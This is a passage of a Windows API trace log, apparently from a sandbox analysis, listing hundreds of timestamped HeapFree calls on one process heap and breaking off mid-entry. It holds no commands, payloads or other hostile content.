[0185.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.734] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.740] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0185.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0186.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.504] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.504] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0186.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44550c8 | out: hHeap=0x680000) returned 1 [0186.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.615] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0186.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: 